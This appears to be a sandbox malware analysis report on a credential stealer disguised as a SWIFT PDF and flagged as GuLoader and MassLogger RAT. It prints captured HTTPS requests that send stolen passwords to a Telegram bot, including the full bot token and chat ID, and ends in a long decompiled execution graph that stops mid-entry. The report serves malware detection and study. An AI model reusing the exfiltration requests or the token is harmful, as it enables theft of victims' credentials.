                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":12277,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734336358,"document":{"file_n


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.449883149.154.167.2204437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:06:01 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1dfb205ad284
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-16 08:06:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 66 62 32 30 35 61 64 32 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1dfb205ad284Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-16 08:06:02 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 16 Dec 2024 08:06:02 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 542
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-16 08:06:02 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 36 33 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":12278,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734336362,"document":{"file_n


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449891149.154.167.2204437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:06:05 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1e200f538461
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-16 08:06:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 32 30 30 66 35 33 38 34 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1e200f538461Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-16 08:06:06 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 16 Dec 2024 08:06:06 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 542
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-16 08:06:06 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 36 33 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":12279,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734336366,"document":{"file_n


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:03:04:00
                                                                                                                              Start date:16/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:434'942 bytes
                                                                                                                              MD5 hash:397346C3391583257950CFE556F0A5E6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2465323286.0000000002B76000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:03:05:17
                                                                                                                              Start date:16/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:434'942 bytes
                                                                                                                              MD5 hash:397346C3391583257950CFE556F0A5E6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2936005396.0000000001816000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:21.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:14%
                                                                                                                                Signature Coverage:25.1%
                                                                                                                                Total number of Nodes:1511
                                                                                                                                Total number of Limit Nodes:47
                                                                                                                                execution_graph 4793 10001000 4796 1000101b 4793->4796 4803 10001516 4796->4803 4798 10001020 4799 10001024 4798->4799 4800 10001027 GlobalAlloc 4798->4800 4801 1000153d 3 API calls 4799->4801 4800->4799 4802 10001019 4801->4802 4805 1000151c 4803->4805 4804 10001522 4804->4798 4805->4804 4806 1000152e GlobalFree 4805->4806 4806->4798 4807 401cc0 4808 402ba2 18 API calls 4807->4808 4809 401cc7 4808->4809 4810 402ba2 18 API calls 4809->4810 4811 401ccf GetDlgItem 4810->4811 4812 402531 4811->4812 4813 4029c0 4814 402ba2 18 API calls 4813->4814 4815 4029c6 4814->4815 4816 4029f9 4815->4816 4818 4029d4 4815->4818 4819 40281e 4815->4819 4817 406077 18 API calls 4816->4817 4816->4819 4817->4819 4818->4819 4821 405f9c wsprintfW 4818->4821 4821->4819 4190 403c41 4191 403d94 4190->4191 4192 403c59 4190->4192 4194 403de5 4191->4194 4195 403da5 GetDlgItem GetDlgItem 4191->4195 4192->4191 4193 403c65 4192->4193 4196 403c70 SetWindowPos 4193->4196 4197 403c83 4193->4197 4199 403e3f 4194->4199 4208 401389 2 API calls 4194->4208 4198 404119 19 API calls 4195->4198 4196->4197 4201 403ca0 4197->4201 4202 403c88 ShowWindow 4197->4202 4203 403dcf SetClassLongW 4198->4203 4200 404165 SendMessageW 4199->4200 4204 403d8f 4199->4204 4230 403e51 4200->4230 4205 403cc2 4201->4205 4206 403ca8 DestroyWindow 4201->4206 4202->4201 4207 40140b 2 API calls 4203->4207 4210 403cc7 SetWindowLongW 4205->4210 4211 403cd8 4205->4211 4209 4040c3 4206->4209 4207->4194 4212 403e17 4208->4212 4209->4204 4219 4040d3 ShowWindow 4209->4219 4210->4204 4216 403d81 4211->4216 4217 403ce4 GetDlgItem 4211->4217 4212->4199 4213 403e1b SendMessageW 4212->4213 4213->4204 4214 40140b 2 API calls 4214->4230 4215 4040a4 DestroyWindow EndDialog 4215->4209 4270 404180 4216->4270 4220 403d14 4217->4220 4221 403cf7 SendMessageW IsWindowEnabled 4217->4221 4219->4204 4223 403d21 4220->4223 4224 403d68 SendMessageW 4220->4224 4225 403d34 4220->4225 4234 403d19 4220->4234 4221->4204 4221->4220 4222 406077 18 API calls 4222->4230 4223->4224 4223->4234 4224->4216 4227 403d51 4225->4227 4228 403d3c 4225->4228 4232 40140b 2 API calls 4227->4232 4231 40140b 2 API calls 4228->4231 4229 403d4f 4229->4216 4230->4204 4230->4214 4230->4215 4230->4222 4233 404119 19 API calls 4230->4233 4251 403fe4 DestroyWindow 4230->4251 4261 404119 4230->4261 4231->4234 4235 403d58 4232->4235 4233->4230 4267 4040f2 4234->4267 4235->4216 4235->4234 4237 403ecc GetDlgItem 4238 403ee1 4237->4238 4239 403ee9 ShowWindow KiUserCallbackDispatcher 4237->4239 4238->4239 4264 40413b EnableWindow 4239->4264 4241 403f13 EnableWindow 4244 403f27 4241->4244 4242 403f2c GetSystemMenu EnableMenuItem SendMessageW 4243 403f5c SendMessageW 4242->4243 4242->4244 4243->4244 4244->4242 4265 40414e SendMessageW 4244->4265 4266 406055 lstrcpynW 4244->4266 4247 403f8a lstrlenW 4248 406077 18 API calls 4247->4248 4249 403fa0 SetWindowTextW 4248->4249 4250 401389 2 API calls 4249->4250 4250->4230 4251->4209 4252 403ffe CreateDialogParamW 4251->4252 4252->4209 4253 404031 4252->4253 4254 404119 19 API calls 4253->4254 4255 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4254->4255 4256 401389 2 API calls 4255->4256 4257 404082 4256->4257 4257->4204 4258 40408a ShowWindow 4257->4258 4259 404165 SendMessageW 4258->4259 4260 4040a2 4259->4260 4260->4209 4262 406077 18 API calls 4261->4262 4263 404124 SetDlgItemTextW 4262->4263 4263->4237 4264->4241 4265->4244 4266->4247 4268 4040f9 4267->4268 4269 4040ff SendMessageW 4267->4269 4268->4269 4269->4229 4271 404221 4270->4271 4272 404198 GetWindowLongW 4270->4272 4271->4204 4272->4271 4273 4041a9 4272->4273 4274 4041b8 GetSysColor 4273->4274 4275 4041bb 4273->4275 4274->4275 4276 4041c1 SetTextColor 4275->4276 4277 4041cb SetBkMode 4275->4277 4276->4277 4278 4041e3 GetSysColor 4277->4278 4279 4041e9 4277->4279 4278->4279 4280 4041f0 SetBkColor 4279->4280 4281 4041fa 4279->4281 4280->4281 4281->4271 4282 404214 CreateBrushIndirect 4281->4282 4283 40420d DeleteObject 4281->4283 4282->4271 4283->4282 4284 401fc3 4285 401fd5 4284->4285 4295 402087 4284->4295 4307 402bbf 4285->4307 4288 401423 25 API calls 4293 4021e1 4288->4293 4289 402bbf 18 API calls 4290 401fe5 4289->4290 4291 401ffb LoadLibraryExW 4290->4291 4292 401fed GetModuleHandleW 4290->4292 4294 40200c 4291->4294 4291->4295 4292->4291 4292->4294 4313 40649a WideCharToMultiByte 4294->4313 4295->4288 4298 402056 4300 4051b4 25 API calls 4298->4300 4299 40201d 4301 402025 4299->4301 4302 40203c 4299->4302 4303 40202d 4300->4303 4358 401423 4301->4358 4316 10001759 4302->4316 4303->4293 4305 402079 FreeLibrary 4303->4305 4305->4293 4308 402bcb 4307->4308 4309 406077 18 API calls 4308->4309 4310 402bec 4309->4310 4311 401fdc 4310->4311 4312 4062e9 5 API calls 4310->4312 4311->4289 4312->4311 4314 4064c4 GetProcAddress 4313->4314 4315 402017 4313->4315 4314->4315 4315->4298 4315->4299 4317 10001789 4316->4317 4361 10001b18 4317->4361 4319 10001790 4320 100018a6 4319->4320 4321 100017a1 4319->4321 4322 100017a8 4319->4322 4320->4303 4410 10002286 4321->4410 4393 100022d0 4322->4393 4327 1000180c 4333 10001812 4327->4333 4334 1000184e 4327->4334 4328 100017ee 4423 100024a9 4328->4423 4329 100017d7 4344 100017cd 4329->4344 4420 10002b5f 4329->4420 4330 100017be 4332 100017c4 4330->4332 4338 100017cf 4330->4338 4332->4344 4404 100028a4 4332->4404 4340 100015b4 3 API calls 4333->4340 4336 100024a9 10 API calls 4334->4336 4342 10001840 4336->4342 4337 100017f4 4434 100015b4 4337->4434 4414 10002645 4338->4414 4341 10001828 4340->4341 4346 100024a9 10 API calls 4341->4346 4349 10001895 4342->4349 4445 1000246c 4342->4445 4344->4327 4344->4328 4346->4342 4348 100017d5 4348->4344 4349->4320 4351 1000189f GlobalFree 4349->4351 4351->4320 4355 10001881 4355->4349 4449 1000153d wsprintfW 4355->4449 4356 1000187a FreeLibrary 4356->4355 4359 4051b4 25 API calls 4358->4359 4360 401431 4359->4360 4360->4303 4452 1000121b GlobalAlloc 4361->4452 4363 10001b3c 4453 1000121b GlobalAlloc 4363->4453 4365 10001d7a GlobalFree GlobalFree GlobalFree 4366 10001d97 4365->4366 4381 10001de1 4365->4381 4367 100020ee 4366->4367 4376 10001dac 4366->4376 4366->4381 4369 10002110 GetModuleHandleW 4367->4369 4367->4381 4368 10001c1d GlobalAlloc 4391 10001b47 4368->4391 4372 10002121 LoadLibraryW 4369->4372 4373 10002136 4369->4373 4370 10001c68 lstrcpyW 4375 10001c72 lstrcpyW 4370->4375 4371 10001c86 GlobalFree 4371->4391 4372->4373 4372->4381 4460 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4373->4460 4375->4391 4376->4381 4456 1000122c 4376->4456 4377 10002188 4380 10002195 lstrlenW 4377->4380 4377->4381 4378 10002048 4378->4381 4385 10002090 lstrcpyW 4378->4385 4461 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4380->4461 4381->4319 4382 10002148 4382->4377 4392 10002172 GetProcAddress 4382->4392 4385->4381 4386 10001cc4 4386->4391 4454 1000158f GlobalSize GlobalAlloc 4386->4454 4387 10001f37 GlobalFree 4387->4391 4388 100021af 4388->4381 4390 1000122c 2 API calls 4390->4391 4391->4365 4391->4368 4391->4370 4391->4371 4391->4375 4391->4378 4391->4381 4391->4386 4391->4387 4391->4390 4459 1000121b GlobalAlloc 4391->4459 4392->4377 4401 100022e8 4393->4401 4394 1000122c GlobalAlloc lstrcpynW 4394->4401 4396 10002415 GlobalFree 4397 100017ae 4396->4397 4396->4401 4397->4329 4397->4330 4397->4344 4398 100023d3 lstrlenW 4398->4396 4402 100023d1 4398->4402 4399 100023ba GlobalAlloc 4399->4402 4400 1000238f GlobalAlloc WideCharToMultiByte 4400->4396 4401->4394 4401->4396 4401->4398 4401->4399 4401->4400 4463 100012ba 4401->4463 4402->4396 4467 100025d9 4402->4467 4406 100028b6 4404->4406 4405 1000295b VirtualAlloc 4407 10002979 4405->4407 4406->4405 4408 10002a75 4407->4408 4409 10002a6a GetLastError 4407->4409 4408->4344 4409->4408 4411 10002296 4410->4411 4412 100017a7 4410->4412 4411->4412 4413 100022a8 GlobalAlloc 4411->4413 4412->4322 4413->4411 4418 10002661 4414->4418 4415 100026b2 GlobalAlloc 4419 100026d4 4415->4419 4416 100026c5 4417 100026ca GlobalSize 4416->4417 4416->4419 4417->4419 4418->4415 4418->4416 4419->4348 4421 10002b6a 4420->4421 4422 10002baa GlobalFree 4421->4422 4470 1000121b GlobalAlloc 4423->4470 4425 10002530 StringFromGUID2 4430 100024b3 4425->4430 4426 10002541 lstrcpynW 4426->4430 4427 1000250b MultiByteToWideChar 4427->4430 4428 10002554 wsprintfW 4428->4430 4429 10002571 GlobalFree 4429->4430 4430->4425 4430->4426 4430->4427 4430->4428 4430->4429 4431 100025ac GlobalFree 4430->4431 4432 10001272 2 API calls 4430->4432 4471 100012e1 4430->4471 4431->4337 4432->4430 4475 1000121b GlobalAlloc 4434->4475 4436 100015ba 4437 100015e1 4436->4437 4438 100015c7 lstrcpyW 4436->4438 4440 100015fb 4437->4440 4441 100015e6 wsprintfW 4437->4441 4438->4440 4442 10001272 4440->4442 4441->4440 4443 100012b5 GlobalFree 4442->4443 4444 1000127b GlobalAlloc lstrcpynW 4442->4444 4443->4342 4444->4443 4446 10001861 4445->4446 4447 1000247a 4445->4447 4446->4355 4446->4356 4447->4446 4448 10002496 GlobalFree 4447->4448 4448->4447 4450 10001272 2 API calls 4449->4450 4451 1000155e 4450->4451 4451->4349 4452->4363 4453->4391 4455 100015ad 4454->4455 4455->4386 4462 1000121b GlobalAlloc 4456->4462 4458 1000123b lstrcpynW 4458->4381 4459->4391 4460->4382 4461->4388 4462->4458 4464 100012c1 4463->4464 4465 1000122c 2 API calls 4464->4465 4466 100012df 4465->4466 4466->4401 4468 100025e7 VirtualAlloc 4467->4468 4469 1000263d 4467->4469 4468->4469 4469->4402 4470->4430 4472 100012ea 4471->4472 4473 1000130c 4471->4473 4472->4473 4474 100012f0 lstrcpyW 4472->4474 4473->4430 4474->4473 4475->4436 4822 4016c4 4823 402bbf 18 API calls 4822->4823 4824 4016ca GetFullPathNameW 4823->4824 4825 4016e4 4824->4825 4831 401706 4824->4831 4827 406398 2 API calls 4825->4827 4825->4831 4826 40171b GetShortPathNameW 4828 402a4c 4826->4828 4829 4016f6 4827->4829 4829->4831 4832 406055 lstrcpynW 4829->4832 4831->4826 4831->4828 4832->4831 4833 4014cb 4834 4051b4 25 API calls 4833->4834 4835 4014d2 4834->4835 4836 40194e 4837 402bbf 18 API calls 4836->4837 4838 401955 lstrlenW 4837->4838 4839 402531 4838->4839 4840 4027ce 4841 4027d6 4840->4841 4842 4027da FindNextFileW 4841->4842 4844 4027ec 4841->4844 4843 402833 4842->4843 4842->4844 4846 406055 lstrcpynW 4843->4846 4846->4844 4673 401754 4674 402bbf 18 API calls 4673->4674 4675 40175b 4674->4675 4676 405c59 2 API calls 4675->4676 4677 401762 4676->4677 4678 405c59 2 API calls 4677->4678 4678->4677 4847 401d56 GetDC GetDeviceCaps 4848 402ba2 18 API calls 4847->4848 4849 401d74 MulDiv ReleaseDC 4848->4849 4850 402ba2 18 API calls 4849->4850 4851 401d93 4850->4851 4852 406077 18 API calls 4851->4852 4853 401dcc CreateFontIndirectW 4852->4853 4854 402531 4853->4854 4854->4854 4855 401a57 4856 402ba2 18 API calls 4855->4856 4857 401a5d 4856->4857 4858 402ba2 18 API calls 4857->4858 4859 401a05 4858->4859 4860 4014d7 4861 402ba2 18 API calls 4860->4861 4862 4014dd Sleep 4861->4862 4864 402a4c 4862->4864 4865 40155b 4866 4029f2 4865->4866 4869 405f9c wsprintfW 4866->4869 4868 4029f7 4869->4868 4775 401ddc 4776 402ba2 18 API calls 4775->4776 4777 401de2 4776->4777 4778 402ba2 18 API calls 4777->4778 4779 401deb 4778->4779 4780 401df2 ShowWindow 4779->4780 4781 401dfd EnableWindow 4779->4781 4782 402a4c 4780->4782 4781->4782 4870 40385c 4871 403867 4870->4871 4872 40386b 4871->4872 4873 40386e GlobalAlloc 4871->4873 4873->4872 4874 4022df 4875 402bbf 18 API calls 4874->4875 4876 4022ee 4875->4876 4877 402bbf 18 API calls 4876->4877 4878 4022f7 4877->4878 4879 402bbf 18 API calls 4878->4879 4880 402301 GetPrivateProfileStringW 4879->4880 4881 401bdf 4882 402ba2 18 API calls 4881->4882 4883 401be6 4882->4883 4884 402ba2 18 API calls 4883->4884 4885 401bf0 4884->4885 4886 401c00 4885->4886 4887 402bbf 18 API calls 4885->4887 4888 401c10 4886->4888 4889 402bbf 18 API calls 4886->4889 4887->4886 4890 401c1b 4888->4890 4891 401c5f 4888->4891 4889->4888 4892 402ba2 18 API calls 4890->4892 4893 402bbf 18 API calls 4891->4893 4894 401c20 4892->4894 4895 401c64 4893->4895 4896 402ba2 18 API calls 4894->4896 4897 402bbf 18 API calls 4895->4897 4898 401c29 4896->4898 4899 401c6d FindWindowExW 4897->4899 4900 401c31 SendMessageTimeoutW 4898->4900 4901 401c4f SendMessageW 4898->4901 4902 401c8f 4899->4902 4900->4902 4901->4902 4903 401960 4904 402ba2 18 API calls 4903->4904 4905 401967 4904->4905 4906 402ba2 18 API calls 4905->4906 4907 401971 4906->4907 4908 402bbf 18 API calls 4907->4908 4909 40197a 4908->4909 4910 40198e lstrlenW 4909->4910 4915 4019ca 4909->4915 4911 401998 4910->4911 4911->4915 4916 406055 lstrcpynW 4911->4916 4913 4019b3 4914 4019c0 lstrlenW 4913->4914 4913->4915 4914->4915 4916->4913 4917 401662 4918 402bbf 18 API calls 4917->4918 4919 401668 4918->4919 4920 406398 2 API calls 4919->4920 4921 40166e 4920->4921 4922 4019e4 4923 402bbf 18 API calls 4922->4923 4924 4019eb 4923->4924 4925 402bbf 18 API calls 4924->4925 4926 4019f4 4925->4926 4927 4019fb lstrcmpiW 4926->4927 4928 401a0d lstrcmpW 4926->4928 4929 401a01 4927->4929 4928->4929 4476 4025e5 4490 402ba2 4476->4490 4478 4025f4 4479 40263a ReadFile 4478->4479 4480 405cad ReadFile 4478->4480 4481 4026d3 4478->4481 4482 40267a MultiByteToWideChar 4478->4482 4483 40272f 4478->4483 4486 4026a0 SetFilePointer MultiByteToWideChar 4478->4486 4487 402740 4478->4487 4489 40272d 4478->4489 4479->4478 4479->4489 4480->4478 4481->4478 4481->4489 4493 405d0b SetFilePointer 4481->4493 4482->4478 4502 405f9c wsprintfW 4483->4502 4486->4478 4488 402761 SetFilePointer 4487->4488 4487->4489 4488->4489 4491 406077 18 API calls 4490->4491 4492 402bb6 4491->4492 4492->4478 4494 405d27 4493->4494 4500 405d43 4493->4500 4495 405cad ReadFile 4494->4495 4496 405d33 4495->4496 4497 405d74 SetFilePointer 4496->4497 4498 405d4c SetFilePointer 4496->4498 4496->4500 4497->4500 4498->4497 4499 405d57 4498->4499 4501 405cdc WriteFile 4499->4501 4500->4481 4501->4500 4502->4489 4930 401e66 4931 402bbf 18 API calls 4930->4931 4932 401e6c 4931->4932 4933 4051b4 25 API calls 4932->4933 4934 401e76 4933->4934 4935 405735 2 API calls 4934->4935 4936 401e7c 4935->4936 4937 40281e 4936->4937 4938 401edb CloseHandle 4936->4938 4939 401e8c WaitForSingleObject 4936->4939 4938->4937 4941 401e9e 4939->4941 4940 401eb0 GetExitCodeProcess 4942 401ec2 4940->4942 4943 401ecd 4940->4943 4941->4940 4944 406467 2 API calls 4941->4944 4947 405f9c wsprintfW 4942->4947 4943->4938 4946 401ea5 WaitForSingleObject 4944->4946 4946->4941 4947->4943 4512 401767 4513 402bbf 18 API calls 4512->4513 4514 40176e 4513->4514 4515 401796 4514->4515 4516 40178e 4514->4516 4553 406055 lstrcpynW 4515->4553 4552 406055 lstrcpynW 4516->4552 4519 401794 4523 4062e9 5 API calls 4519->4523 4520 4017a1 4521 405a09 3 API calls 4520->4521 4522 4017a7 lstrcatW 4521->4522 4522->4519 4533 4017b3 4523->4533 4524 4017ef 4526 405c05 2 API calls 4524->4526 4525 406398 2 API calls 4525->4533 4526->4533 4528 4017c5 CompareFileTime 4528->4533 4529 401885 4530 4051b4 25 API calls 4529->4530 4532 40188f 4530->4532 4531 4051b4 25 API calls 4541 401871 4531->4541 4534 403027 32 API calls 4532->4534 4533->4524 4533->4525 4533->4528 4533->4529 4535 406055 lstrcpynW 4533->4535 4539 406077 18 API calls 4533->4539 4546 40579a MessageBoxIndirectW 4533->4546 4549 40185c 4533->4549 4551 405c2a GetFileAttributesW CreateFileW 4533->4551 4536 4018a2 4534->4536 4535->4533 4537 4018b6 SetFileTime 4536->4537 4538 4018c8 CloseHandle 4536->4538 4537->4538 4540 4018d9 4538->4540 4538->4541 4539->4533 4542 4018f1 4540->4542 4543 4018de 4540->4543 4545 406077 18 API calls 4542->4545 4544 406077 18 API calls 4543->4544 4547 4018e6 lstrcatW 4544->4547 4548 4018f9 4545->4548 4546->4533 4547->4548 4550 40579a MessageBoxIndirectW 4548->4550 4549->4531 4549->4541 4550->4541 4551->4533 4552->4519 4553->4520 4948 404267 lstrlenW 4949 404286 4948->4949 4950 404288 WideCharToMultiByte 4948->4950 4949->4950 4951 100018a9 4952 100018cc 4951->4952 4953 100018ff GlobalFree 4952->4953 4954 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4952->4954 4953->4954 4955 10001272 2 API calls 4954->4955 4956 10001a87 GlobalFree GlobalFree 4955->4956 4957 401ee9 4958 402bbf 18 API calls 4957->4958 4959 401ef0 4958->4959 4960 406398 2 API calls 4959->4960 4961 401ef6 4960->4961 4963 401f07 4961->4963 4964 405f9c wsprintfW 4961->4964 4964->4963 4965 